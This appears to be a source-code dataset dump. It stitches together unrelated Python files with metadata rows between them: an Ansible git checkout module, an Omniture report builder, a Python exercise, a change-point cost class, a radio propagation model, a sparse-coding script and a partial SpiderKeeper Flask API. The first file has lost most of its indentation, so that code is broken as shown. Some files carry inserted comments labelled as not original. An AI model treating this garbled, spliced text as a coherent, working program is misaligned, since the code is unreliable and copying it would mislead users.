named_pipe_path = os.path.join(self.ssh_auth_sock_dir, "keypipe." + str(random.getrandbits(64)))
try:
os.mkfifo(named_pipe_path, 0600)
except OSError, exception:
print "Failed to create FIFO: %s" % exception
devnull = open(os.devnull, 'w')
ssh_add = subprocess.Popen(["ssh-add", named_pipe_path], stdout=devnull, stderr=devnull)
fifo = open(named_pipe_path, 'w')
print >> fifo, key
fifo.close()
#Popen.wait() doesn't have a timeout, so we'll implement one using poll() :(
start_time = datetime.datetime.now()
while ssh_add.poll() is None:
if (datetime.datetime.now() - start_time).total_seconds() > 5:
try:
ssh_add.kill()
except OSError:
pass
raise SshAgentException("Unable to add ssh key. Timed out. Does key have a passphrase?")
time.sleep(0.1)
os.remove(named_pipe_path)
# pylint: disable=too-many-lines
# these are already imported inside of the ssh library
#import os
#import subprocess
import json  # used by git_cmd() below to parse JSON output
class GitCLIError(Exception):
'''Exception class for openshiftcli'''
pass
# pylint: disable=too-few-public-methods
class GitCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
path,
verbose=False,
ssh_key=None,
author=None):
''' Constructor for GitCLI '''
self.path = path
self.verbose = verbose
self.ssh_key = ssh_key
self.author = author
self.environment_vars = os.environ.copy()
if self.author:
author_dict = {}
            author_list = author.split('<')
            author_dict['GIT_COMMITTER_NAME'] = author_list[0].strip()
            if len(author_list) > 1:
                author_dict['GIT_COMMITTER_EMAIL'] = author_list[1].strip().rstrip('>')
self.environment_vars.update(author_dict)
def _add(self, files_to_add=None):
''' git add '''
cmd = ["add", "--no-ignore-removal"]
if files_to_add:
cmd.extend(files_to_add)
else:
cmd.append('.')
results = self.git_cmd(cmd)
return results
def _commit(self, msg, author=None):
''' git commit with message '''
cmd = ["commit", "-m", msg]
if author:
cmd += ["--author", author]
results = self.git_cmd(cmd)
return results
def _clone(self, repo, dest, bare=False):
''' git clone '''
cmd = ["clone"]
if bare:
cmd += ["--bare"]
cmd += [repo, dest]
results = self.git_cmd(cmd)
return results
def _fetch(self, remote):
''' git fetch '''
cmd = ["fetch"]
cmd += [remote]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _status(self, porcelain=False, show_untracked=True):
''' Do a git status '''
cmd = ["status"]
if porcelain:
cmd.append('--porcelain')
if show_untracked:
cmd.append('--untracked-files=normal')
else:
cmd.append('--untracked-files=no')
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _checkout(self, branch):
''' Do a git checkout to <branch> '''
cmd = ["checkout", branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _get_current_branch(self):
        ''' Return the name of the current branch '''
cmd = ["describe", "--contains", "--all", "HEAD"]
results = self.git_cmd(cmd, output=True, output_type='raw')
results['results'] = results['results'].rstrip()
return results
def _merge(self, merge_id):
        ''' Do a git merge of <merge_id> '''
cmd = ["merge", merge_id]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _push(self, remote, src_branch, dest_branch):
        ''' Do a git push of <src_branch> to <dest_branch> on <remote> '''
push_branches = src_branch + ":" + dest_branch
cmd = ["push", remote, push_branches]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _remote_update(self):
''' Do a git remote update '''
cmd = ["remote", "update"]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _diff(self, diff_branch):
        ''' Do a git diff against <diff_branch> '''
cmd = ["diff", diff_branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _rebase(self, rebase_branch):
        ''' Do a git rebase onto <rebase_branch> '''
cmd = ["rebase", rebase_branch]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def _config(self, get_args):
''' Do a git config --get <get_args> '''
cmd = ["config", '--get', get_args]
results = self.git_cmd(cmd, output=True, output_type='raw')
return results
def git_cmd(self, cmd, output=False, output_type='json'):
'''Base command for git '''
cmds = ['/usr/bin/git']
cmds.extend(cmd)
rval = {}
results = ''
err = None
if self.verbose:
print ' '.join(cmds)
if self.ssh_key:
with SshAgent() as agent:
self.environment_vars['SSH_AUTH_SOCK'] = os.environ['SSH_AUTH_SOCK']
agent.add_key(self.ssh_key)
proc = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.environment_vars)
stdout, stderr = proc.communicate()
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
else:
proc = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.environment_vars)
stdout, stderr = proc.communicate()
rval = {"returncode": proc.returncode,
"results": results,
"cmd": ' '.join(cmds),
}
if proc.returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.message:
err = err.message
elif output_type == 'raw':
rval['results'] = stdout
if self.verbose:
print stdout
print stderr
if err:
rval.update({"err": err,
"cmd": cmds
})
else:
rval.update({"results": {}})
# Always include stdout/stderr:
rval.update({"stderr": stderr,
"stdout": stdout})
return rval
class GitCheckout(GitCLI):
''' Class to wrap the git checkout command line tools
'''
# pylint: disable=too-many-arguments
def __init__(self,
path,
branch):
''' Constructor for GitCheckout '''
super(GitCheckout, self).__init__(path)
self.path = path
self.branch = branch
self.debug = []
os.chdir(path)
def checkout(self):
'''perform a git checkout '''
current_branch_results = self._get_current_branch()
if current_branch_results['results'] == self.branch:
current_branch_results['checkout_not_needed'] = True
return current_branch_results
rval = {}
rval['branch_results'] = current_branch_results
checkout_results = self._checkout(self.branch)
rval['checkout_results'] = checkout_results
rval['returncode'] = checkout_results['returncode']
return rval
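# --- Illustrative usage sketch (added for clarity; not part of the original
# module). The repository path and branch name below are hypothetical:
#   checkout = GitCheckout('/path/to/repo', 'master')
#   result = checkout.checkout()  # dict with 'returncode' / 'checkout_results'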
def main():
'''
ansible git module for checkout
'''
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', type='str', choices=['present']),
path=dict(default=None, required=True, type='str'),
branch=dict(default=None, required=True, type='str'),
),
supports_check_mode=False,
)
git = GitCheckout(module.params['path'],
module.params['branch'])
state = module.params['state']
if state == 'present':
results = git.checkout()
if results['returncode'] != 0:
module.fail_json(msg=results)
if results.has_key('checkout_not_needed'):
module.exit_json(changed=False, results=results, state="present")
module.exit_json(changed=True, results=results, state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. These are required
if __name__ == '__main__':
from ansible.module_utils.basic import *
main()
| apache-2.0 | 8,853,674,202,672,386,000 | 30.058166 | 120 | 0.526759 | false | 4.072455 | false | false | false |
DeStars/omniture_python | omniture_python/report_definition.py | 1 | 2519 | from datetime import datetime
__author__ = 'DeStars'
class ReportBuilder:
def __init__(self):
self.data = {}
@classmethod
def _elements(cls):
return ("_suite_id", "_start_date", "_end_date",
"_date_granularity", "_metrics_id", "_elements")
@staticmethod
def _convert_to_int(int_str):
return int(int_str)
@staticmethod
def _convert_to_date(date_str):
return datetime.strptime(date_str, '%Y-%m-%d').strftime("%Y-%m-%d")
def _copy(self):
obj = ReportBuilder()
for val in ReportBuilder._elements():
if val in self.data:
obj.data[val] = self.data[val]
return obj
def with_report_suite_id(self, suite_id):
obj = self._copy()
obj.data["_suite_id"] = suite_id
return obj
def with_dates(self, start_date, end_date):
obj = self._with_start_date(start_date)._with_end_date(end_date)
return obj
def _with_start_date(self, date):
obj = self._copy()
obj.data["_start_date"] = self._convert_to_date(date)
return obj
def _with_end_date(self, date):
obj = self._copy()
obj.data["_end_date"] = self._convert_to_date(date)
return obj
def with_date_granularity(self, granularity):
obj = self._copy()
obj.data["_date_granularity"] = granularity
return obj
def add_metrics(self, metrics_id):
obj = self._copy()
if "_metrics_id" not in obj.data:
obj.data["_metrics_id"] = []
obj.data["_metrics_id"].extend(metrics_id)
return obj
def add_elements(self, element_id, num_values):
obj = self._copy()
if "_elements" not in obj.data:
obj.data["_elements"] = []
obj.data["_elements"].append([element_id, str(num_values)])
return obj
def get_report_definition(self):
# check all required elements are available
# return object
metrics = [{"id": mid} for mid in self.data["_metrics_id"]]
elements = [{"id": eid, "top": top} for eid, top in self.data["_elements"]]
return {
"reportDescription":{
"reportSuiteID": self.data["_suite_id"],
"dateFrom": self.data["_start_date"],
"dateTo": self.data["_end_date"],
"dateGranularity": self.data["_date_granularity"],
"metrics": metrics,
"elements": elements
}
}
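# --- Illustrative usage sketch (added for clarity; not part of the original
# module). The suite ID, dates, and metric/element IDs are hypothetical:
if __name__ == '__main__':
    definition = (ReportBuilder()
                  .with_report_suite_id('example-suite')
                  .with_dates('2016-01-01', '2016-01-31')
                  .with_date_granularity('day')
                  .add_metrics(['pageviews', 'visits'])
                  .add_elements('page', 10)
                  .get_report_definition())
    print(definition)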
| mit | 6,300,023,046,565,561,000 | 29.719512 | 83 | 0.543867 | false | 3.765321 | false | false | false |
Karunesh/google_python_exercises | copyspecial/copyspecial.py | 1 | 1730 | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
def get_special_paths(dir_path):
if not dir_path.endswith('/'):
dir_path = dir_path + '/'
files_and_dirs = os.listdir(dir_path)
special_paths = []
for _name in files_and_dirs:
is_special = re.search(r'__\w+__', _name)
if is_special:
special_paths.append(dir_path + _name)
return special_paths
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
special_paths = get_special_paths(args[0])
for special_path in special_paths:
if todir: # empty strings return False
if not os.path.exists(todir):
os.makedirs(todir)
shutil.copy(special_path, todir)
elif tozip:
print 'case tozip yet to be implemented'
else:
print special_path
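# --- Illustrative sketch of the unimplemented --tozip case (added for
# clarity; not part of the original solution). It shells out to `zip -j`
# via the already-imported `commands` module; main()'s tozip branch above
# could call this helper:
def copy_to_zip(paths, zipfile):
  cmd = 'zip -j %s %s' % (zipfile, ' '.join(paths))
  (status, output) = commands.getstatusoutput(cmd)
  if status:
    sys.stderr.write(output)
    sys.exit(1)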
if __name__ == "__main__":
main()
| apache-2.0 | -6,789,120,600,701,348,000 | 23.027778 | 67 | 0.645665 | false | 3.295238 | false | false | false |
deepcharles/ruptures | src/ruptures/costs/costml.py | 1 | 1843 | r"""Change detection with a Mahalanobis-type metric"""
import numpy as np
from numpy.linalg import inv
from ruptures.base import BaseCost
from ruptures.exceptions import NotEnoughPoints
class CostMl(BaseCost):
r"""Mahalanobis-type cost function."""
model = "mahalanobis"
def __init__(self, metric=None):
"""Create a new instance.
Args:
            metric (ndarray, optional): PSD matrix that defines a Mahalanobis-type pseudo distance. If None, defaults to the inverse covariance (Mahalanobis) matrix. Shape (n_features, n_features).
"""
self.metric = metric
self.gram = None
self.min_size = 2
def fit(self, signal) -> "CostMl":
"""Set parameters of the instance.
Args:
signal (array): signal. Shape (n_samples,) or (n_samples, n_features)
Returns:
self
"""
s_ = signal.reshape(-1, 1) if signal.ndim == 1 else signal
# Mahalanobis metric if self.metric is None
if self.metric is None:
covar = np.cov(s_.T)
self.metric = inv(covar.reshape(1, 1) if covar.size == 1 else covar)
self.gram = s_.dot(self.metric).dot(s_.T)
self.signal = s_
return self
def error(self, start, end):
"""Return the approximation cost on the segment [start:end].
Args:
start (int): start of the segment
end (int): end of the segment
Returns:
float: segment cost
Raises:
NotEnoughPoints: when the segment is too short (less than ``'min_size'`` samples).
"""
if end - start < self.min_size:
raise NotEnoughPoints
sub_gram = self.gram[start:end, start:end]
val = np.diagonal(sub_gram).sum()
val -= sub_gram.sum() / (end - start)
return val
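# --- Illustrative usage sketch (added for clarity; not part of the original
# module). Builds a toy two-regime signal and scores two segments:
if __name__ == "__main__":
    np.random.seed(0)
    signal = np.vstack([np.random.normal(0, 1, (100, 2)),
                        np.random.normal(5, 1, (100, 2))])
    cost = CostMl().fit(signal)
    print(cost.error(0, 100))   # homogeneous segment: low cost
    print(cost.error(50, 150))  # segment straddling the change point: higher cost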
| bsd-2-clause | -1,146,421,115,365,335,800 | 27.353846 | 176 | 0.582203 | false | 3.768916 | false | false | false |
Wireless-Innovation-Forum/Spectrum-Access-System | src/harness/reference_models/propagation/wf_itm.py | 1 | 9864 | # Copyright 2017 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WinnForum-specific version of ITM propagation model.
Typical usage:
# Configure the terrain driver (memory use is: cache_size * 50MB)
from reference_models.geo import drive
drive.ConfigureTerrainDriver(terrain_dir=my_ned_path, cache_size=16)
# Get the path loss and incidence angles
db_loss, incidence_angles, internals = CalcItmPropagationLoss(
lat_cbsd, lon_cbsd, height_cbsd,
lat_rx, lon_rx, height_rx,
cbsd_indoor=False,
reliability=0.5,
freq_mhz=3625.)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import numpy as np
from reference_models.geo import drive
from reference_models.geo import vincenty
from reference_models.propagation.itm import itm
# TEMPORARY to avoid breaking code under PR
terrainDriver = drive.terrain_driver
# ITM warning codes
class ItmErrorCode:
NONE = 0
CAUTION = 1
NOTE = 2
WARNING = 3
OTHER = 4
_ITM_ERROR_MODES = {
ItmErrorCode.NONE: 'No Error.',
ItmErrorCode.CAUTION: ('Caution: Some parameters are nearly out of range.'
' Results should be used with caution.'),
ItmErrorCode.NOTE: ('Note: Default parameters have been substituted for impossible ones.'),
ItmErrorCode.WARNING: ('Warning: A combination of parameters is out of range.'
' Results are probably invalid.'),
ItmErrorCode.OTHER: ('Warning: Some parameters are out of range.'
' Results are probably invalid.')
}
def GetInfoOnItmCode(code):
"""Get description of ITM error code."""
  return _ITM_ERROR_MODES[code]
# Defined namedtuple for nice output packing
_PropagResult = namedtuple('_PropagResult',
['db_loss', 'incidence_angles', 'internals'])
_IncidenceAngles = namedtuple('_IncidenceAngles',
['hor_cbsd', 'ver_cbsd', 'hor_rx', 'ver_rx'])
# Main entry point for the Winnforum compliant ITM propagation model
def CalcItmPropagationLoss(lat_cbsd, lon_cbsd, height_cbsd,
lat_rx, lon_rx, height_rx,
cbsd_indoor=False,
reliability=0.5,
freq_mhz=3625.,
its_elev=None,
is_height_cbsd_amsl=False,
return_internals=False):
"""Implements the WinnForum-compliant ITM point-to-point propagation model.
According to WinnForum spec R2-SGN-17, R2-SGN-22 and R2-SGN-5 to 10.
One can use this routine in 3 ways:
reliability = -1 : to get the average path loss
reliability in [0,1] : to get a pathloss for given quantile
sequence of reliabilities: to get an array of pathloss. Used to obtain
inverse CDF of the pathloss.
Inputs:
lat_cbsd, lon_cbsd, height_cbsd: Lat/lon (deg) and height AGL (m) of CBSD
lat_rx, lon_rx, height_rx: Lat/lon (deg) and height AGL (m) of Rx point
cbsd_indoor: CBSD indoor status - Default=False.
reliability: Reliability. Default is 0.5 (median value)
Different options:
value in [0,1]: returns the CDF quantile
-1: returns the mean path loss
iterable sequence: returns a list of path losses
freq_mhz: Frequency (MHz). Default is mid-point of band.
its_elev: Optional profile to use (in ITM format). Default=None
If not specified, it is extracted from the terrain.
is_height_cbsd_amsl: If True, the CBSD height shall be considered as AMSL (Average
mean sea level).
return_internals: If True, returns internal variables.
Returns:
A namedtuple of:
db_loss Path Loss in dB, either a scalar if reliability is scalar
or a list of path losses if reliability is an iterable.
incidence_angles: A namedtuple of
hor_cbsd: Horizontal departure angle (bearing) from CBSD to Rx
ver_cbsd: Vertical departure angle at CBSD
hor_rx: Horizontal incidence angle (bearing) from Rx to CBSD
ver_rx: Vertical incidence angle at Rx
internals: A dictionary of internal data for advanced analysis
(only if return_internals=True):
itm_err_num: ITM error code from ItmErrorCode (see GetInfoOnItmCode).
itm_str_mode: String containing description of dominant prop mode.
dist_km: Distance between end points (km).
prof_d_km ndarray of distances (km) - x values to plot terrain.
      prof_elev ndarray of terrain heights (m) - y values to plot terrain.
Raises:
Exception if input parameters invalid or out of range.
"""
# Case of same points
if (lat_cbsd == lat_rx and lon_cbsd == lon_rx):
return _PropagResult(
db_loss = 0 if np.isscalar(reliability) else [0] * len(reliability),
incidence_angles = _IncidenceAngles(0,0,0,0),
internals = None)
# Sanity checks on input parameters
if freq_mhz < 40.0 or freq_mhz > 10000:
raise Exception('Frequency outside range [40MHz - 10GHz]')
if is_height_cbsd_amsl:
altitude_cbsd = drive.terrain_driver.GetTerrainElevation(lat_cbsd, lon_cbsd)
height_cbsd = height_cbsd - altitude_cbsd
# Ensure minimum height of 1 meter
if height_cbsd < 1:
height_cbsd = 1
if height_rx < 1:
height_rx = 1
# Internal ITM parameters are always set to following values in WF version:
confidence = 0.5 # Confidence (always 0.5)
dielec = 25. # Dielectric constant (always 25.)
conductivity = 0.02 # Conductivity (always 0.02)
polarization = 1 # Polarization (always vertical = 1)
mdvar = 13
# Get the terrain profile, using Vincenty great circle route, and WF
# standard (bilinear interp; 1500 pts for all distances over 45 km)
if its_elev is None:
its_elev = drive.terrain_driver.TerrainProfile(
lat1=lat_cbsd, lon1=lon_cbsd,
lat2=lat_rx, lon2=lon_rx,
target_res_meter=30.,
do_interp=True, max_points=1501)
# Find the midpoint of the great circle path
dist_km, bearing_cbsd, bearing_rx = vincenty.GeodesicDistanceBearing(
lat_cbsd, lon_cbsd, lat_rx, lon_rx)
latmid, lonmid, _ = vincenty.GeodesicPoint(
lat_cbsd, lon_cbsd, dist_km/2., bearing_cbsd)
# Determine climate value, based on ITU-R P.617 method:
climate = drive.climate_driver.TropoClim(latmid, lonmid)
# If the common volume lies over the sea, the climate value to use depends
# on the climate values at either end. A simple min() function should
# properly implement the logic, since water is the max.
if climate == 7:
climate = min(drive.climate_driver.TropoClim(lat_cbsd, lon_cbsd),
drive.climate_driver.TropoClim(lat_rx, lon_rx))
# Look up the refractivity at the path midpoint, if not explicitly provided
refractivity = drive.refract_driver.Refractivity(latmid, lonmid)
# Call ITM prop loss.
reliabilities = reliability
do_avg = False
if np.isscalar(reliabilities) and reliability == -1:
# Pathloss mean: average the value for 1% to 99% included
reliabilities = np.arange(0.01, 1.0, 0.01)
do_avg = True
db_loss, ver_cbsd, ver_rx, str_mode, err_num = itm.point_to_point(
its_elev, height_cbsd, height_rx,
dielec, conductivity,
refractivity, freq_mhz,
climate, polarization,
confidence, reliabilities,
mdvar, False)
if do_avg:
db_loss = -10*np.log10(np.mean(10**(-np.array(db_loss)/10.)))
# Add indoor losses
if cbsd_indoor:
if np.isscalar(db_loss):
db_loss += 15
else:
db_loss = [loss+15 for loss in db_loss]
# Create distance/terrain arrays for plotting if desired
internals = None
if return_internals:
prof_d_km = (its_elev[1]/1000.) * np.arange(len(its_elev)-2)
prof_elev = np.asarray(its_elev[2:])
internals = {
'itm_err_num': err_num,
'itm_str_mode': str_mode,
'dist_km': dist_km,
'prof_d_km': prof_d_km,
'prof_elev': prof_elev
}
return _PropagResult(
db_loss = db_loss,
incidence_angles = _IncidenceAngles(
hor_cbsd = bearing_cbsd,
ver_cbsd = ver_cbsd,
hor_rx = bearing_rx,
ver_rx = ver_rx),
internals = internals
)
# Utility function to compute the HAAT for a CBSD
def ComputeHaat(lat_cbsd, lon_cbsd, height_cbsd, height_is_agl=True):
"""Computes a CBSD HAAT (Height above average terrain).
Args:
lat_cbsd, lon_cbsd: the CBSD location (degrees).
height_cbsd: the CBSD antenna height (meters)
height_is_agl: boolean specifying if height is AGL (Above Ground Level)
or AMSL (Above Mean Sea Level).
Returns:
the CBSD HAAT (meters).
"""
norm_haat, alt_ground = drive.terrain_driver.ComputeNormalizedHaat(lat_cbsd, lon_cbsd)
if height_is_agl:
return height_cbsd + norm_haat
else:
return height_cbsd - alt_ground + norm_haat
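# --- Illustrative usage sketch (added for clarity; not part of the original
# module). Assumes the terrain/climate/refractivity drivers were configured
# as in the module docstring; the coordinates below are hypothetical:
#   res = CalcItmPropagationLoss(40.0, -105.0, 10.0,
#                                40.1, -105.1, 1.5,
#                                reliability=0.5, freq_mhz=3625.)
#   print(res.db_loss, res.incidence_angles)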
| apache-2.0 | 3,250,323,010,851,435,000 | 37.834646 | 95 | 0.643654 | false | 3.486744 | false | false | false |
emdodds/DictLearner | scripts/tsn_script.py | 1 | 2336 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 28 12:11:07 2016
@author: Eric
"""
import argparse
import pickle
import TopoSparsenet
import numpy as np
import scipy.io as io
parser = argparse.ArgumentParser(description="Learn dictionaries for Topographic Sparsenet with given parameters.")
parser.add_argument('-d', '--data', default='images', type=str)
parser.add_argument('-r', '--resultsfolder', default='',type=str)
parser.add_argument('-s', '--suffix', default='ptwise', type=str)
parser.add_argument('-i', '--niter', default=200, type=int)
parser.add_argument('-l', '--lam', default=0.15, type=float)
parser.add_argument('-l2', '--lam2', default=0.05, type=float)
#parser.add_argument('--shape', default = (25,32), type=tuple)
parser.add_argument('--sigma', default = 1, type=float)
parser.add_argument('--binarize', action='store_true')
args=parser.parse_args()
data = args.data
resultsfolder = args.resultsfolder
shape = (25,32)#args.shape
suffix = args.suffix
niter = args.niter
lam = args.lam
lam2 = args.lam2
sigma = args.sigma
binarize = args.binarize
if data == 'images':
datafile = '../vision/Data/IMAGES.mat'
numinput = 256
data = io.loadmat(datafile)["IMAGES"]
if resultsfolder == '':
resultsfolder = '../vision/Results/'
net = TopoSparsenet.TopoSparsenet(data, shape, paramfile='dummy')
net.gain_rate = 0.001
elif data == 'spectros':
datafile = '../audition/Data/speech_ptwisecut'
numinput = 200
with open(datafile+'_pca.pickle', 'rb') as f:
mypca, origshape = pickle.load(f)
data = np.load(datafile+'.npy')
data = data/data.std()
if resultsfolder == '':
resultsfolder = '../audition/Results/'
net = TopoSparsenet.TopoSparsenet(data=data, dict_shape=shape,
learnrate = 0.0005, datatype='spectro', pca=mypca,
stimshape=origshape,
sigma=sigma,
gain_rate=0.001, var_goal=0.033)
net.niter = niter
net.lamb = lam
net.lamb_2 = lam2
net.learnrate = 0.0005
if binarize:
net.binarize_g()
savestr = resultsfolder+'TSN'+str(shape[0])+'x'+str(shape[1]) + 's'+str(sigma)+ suffix
net.save(savestr+'.pickle')
net.run(ntrials=10000)
net.save()
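# --- Illustrative invocation sketch (added for clarity; not part of the
# original script). Argument values below are hypothetical examples for the
# argparse options defined above:
#   python tsn_script.py --data spectros --lam 0.15 --lam2 0.05 --sigma 1.0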
| mit | 878,909,952,578,454,500 | 30.444444 | 115 | 0.623716 | false | 3.131367 | false | false | false |
DormyMo/SpiderKeeper | SpiderKeeper/app/spider/controller.py | 1 | 23859 | import datetime
import os
import tempfile
import flask_restful
import requests
from flask import Blueprint, request
from flask import abort
from flask import flash
from flask import redirect
from flask import render_template
from flask import session
from flask_restful_swagger import swagger
from werkzeug.utils import secure_filename
from SpiderKeeper.app import db, api, agent, app
from SpiderKeeper.app.spider.model import JobInstance, Project, JobExecution, SpiderInstance, JobRunType
api_spider_bp = Blueprint('spider', __name__)
'''
========= api =========
'''
class ProjectCtrl(flask_restful.Resource):
@swagger.operation(
summary='list projects',
parameters=[])
def get(self):
return [project.to_dict() for project in Project.query.all()]
@swagger.operation(
summary='add project',
parameters=[{
"name": "project_name",
"description": "project name",
"required": True,
"paramType": "form",
"dataType": 'string'
}])
def post(self):
project_name = request.form['project_name']
project = Project()
project.project_name = project_name
db.session.add(project)
db.session.commit()
return project.to_dict()
class SpiderCtrl(flask_restful.Resource):
@swagger.operation(
summary='list spiders',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
project = Project.find_project_by_id(project_id)
return [spider_instance.to_dict() for spider_instance in
SpiderInstance.query.filter_by(project_id=project_id).all()]
class SpiderDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='spider detail',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_id",
"description": "spider instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id, spider_id):
spider_instance = SpiderInstance.query.filter_by(project_id=project_id, id=spider_id).first()
return spider_instance.to_dict() if spider_instance else abort(404)
@swagger.operation(
summary='run spider',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_id",
"description": "spider instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_arguments",
"description": "spider arguments",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "tags",
"description": "spider tags",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "spider desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}])
def put(self, project_id, spider_id):
spider_instance = SpiderInstance.query.filter_by(project_id=project_id, id=spider_id).first()
if not spider_instance: abort(404)
job_instance = JobInstance()
job_instance.spider_name = spider_instance.spider_name
job_instance.project_id = project_id
job_instance.spider_arguments = request.form.get('spider_arguments')
job_instance.desc = request.form.get('desc')
job_instance.tags = request.form.get('tags')
job_instance.run_type = JobRunType.ONETIME
job_instance.priority = request.form.get('priority', 0)
job_instance.enabled = -1
db.session.add(job_instance)
db.session.commit()
agent.start_spider(job_instance)
return True
JOB_INSTANCE_FIELDS = [column.name for column in JobInstance.__table__.columns]
JOB_INSTANCE_FIELDS.remove('id')
JOB_INSTANCE_FIELDS.remove('date_created')
JOB_INSTANCE_FIELDS.remove('date_modified')
class JobCtrl(flask_restful.Resource):
@swagger.operation(
summary='list job instance',
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}])
def get(self, project_id):
return [job_instance.to_dict() for job_instance in
JobInstance.query.filter_by(run_type="periodic", project_id=project_id).all()]
@swagger.operation(
summary='add job instance',
notes="json keys: <br>" + "<br>".join(JOB_INSTANCE_FIELDS),
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_name",
"description": "spider_name",
"required": True,
"paramType": "form",
"dataType": 'string'
}, {
"name": "spider_arguments",
"description": "spider_arguments, split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "tags",
"description": "tags , split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "run_type",
"description": "onetime/periodic",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "cron_minutes",
"description": "@see http://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_hour",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_day_of_week",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "cron_month",
"description": "",
"required": False,
"paramType": "form",
"dataType": 'string'
}])
def post(self, project_id):
post_data = request.form
if post_data:
job_instance = JobInstance()
job_instance.spider_name = post_data['spider_name']
job_instance.project_id = project_id
job_instance.spider_arguments = post_data.get('spider_arguments')
job_instance.desc = post_data.get('desc')
job_instance.tags = post_data.get('tags')
job_instance.run_type = post_data['run_type']
job_instance.priority = post_data.get('priority', 0)
if job_instance.run_type == "periodic":
job_instance.cron_minutes = post_data.get('cron_minutes') or '0'
job_instance.cron_hour = post_data.get('cron_hour') or '*'
job_instance.cron_day_of_month = post_data.get('cron_day_of_month') or '*'
job_instance.cron_day_of_week = post_data.get('cron_day_of_week') or '*'
job_instance.cron_month = post_data.get('cron_month') or '*'
db.session.add(job_instance)
db.session.commit()
return True
class JobDetailCtrl(flask_restful.Resource):
@swagger.operation(
summary='update job instance',
notes="json keys: <br>" + "<br>".join(JOB_INSTANCE_FIELDS),
parameters=[{
"name": "project_id",
"description": "project id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "job_id",
"description": "job instance id",
"required": True,
"paramType": "path",
"dataType": 'int'
}, {
"name": "spider_name",
"description": "spider_name",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "spider_arguments",
"description": "spider_arguments, split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "desc",
"description": "desc",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "tags",
"description": "tags , split by ','",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "run_type",
"description": "onetime/periodic",
"required": False,
"paramType": "form",
"dataType": 'string'
}, {
"name": "priority",
"description": "LOW: -1, NORMAL: 0, HIGH: 1, HIGHEST: 2",
"required": False,
"paramType": "form",
"dataType": 'int'
}, {
"name": "cron_minutes",
